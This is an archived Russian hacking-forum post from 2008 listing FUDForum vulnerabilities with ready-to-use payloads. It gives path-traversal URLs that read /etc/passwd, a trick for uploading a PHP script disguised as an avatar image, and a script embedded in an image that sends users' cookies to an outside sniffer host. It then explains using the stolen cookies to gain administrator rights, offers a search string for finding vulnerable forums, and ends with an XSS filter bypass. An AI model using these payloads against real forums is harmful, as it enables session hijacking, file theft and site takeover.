PDA

Просмотр полной версии : [Обзор Уязвимости FUDForum]


Solide Snake
12.01.2008, 23:25
[Обзор] Уязвимости FUDForum

Офф. Сайт www.fudforum.org
Актуальная версия 2.7.7
Исходники Скачать (http://www.softlinks.ru/download/script.php?scriptID=261)

Уязвимость в admbrowse.php

Уязвимость в admbrowse.php позволяет просматривать произвольные файлы

admbrowse.phpdown=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid]


FUD Forum 2.7.1 PHP code injection vurnelability

Возможность залить вместо аватара PHP скрипт, для этого соедините аватар с PHP файлом.

Под linux/unix

cat foo.png foo.php > upload_me.php

В win в простом Notepad.


Уязвимость в tmp_view.php

Уязвимость позволяет просматривать произвольные файлы.

/tmp_view.php?file=/etc/passwd


Кража cookie

Берём картинку, с названием 1.jpg
Открываем блокнотом. И вставляем в картинку допустим:

<html>
<head>
<script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
</head>
</html>


После вставки в сообщение будет ссылка наподобии этой:

http://forum.site.ru/index.php?t=getfile&id=2723&private=0

или так нагляднее:

http://forum.site.ru/index.php?t=getfile&id=2723

После открытия этой ссылки произойдёт кража куков пользователей.

******
Далее идем сюда:

http://old.antichat.ru/sniff/log.php

И вставляем куки себе. И получаем права аминистратора.

Для поиска:

Powered by: FUDforum 2.7.4


XSS

На некоторых версиях при отключённых картинках, подписях и т.д. есть возможность провести XSS в отправке сообщения:

Бага

В слове javascript букву t нужно заменить на код & # 116 ; без пробелов.

(c) (http://www.securitylab.ru)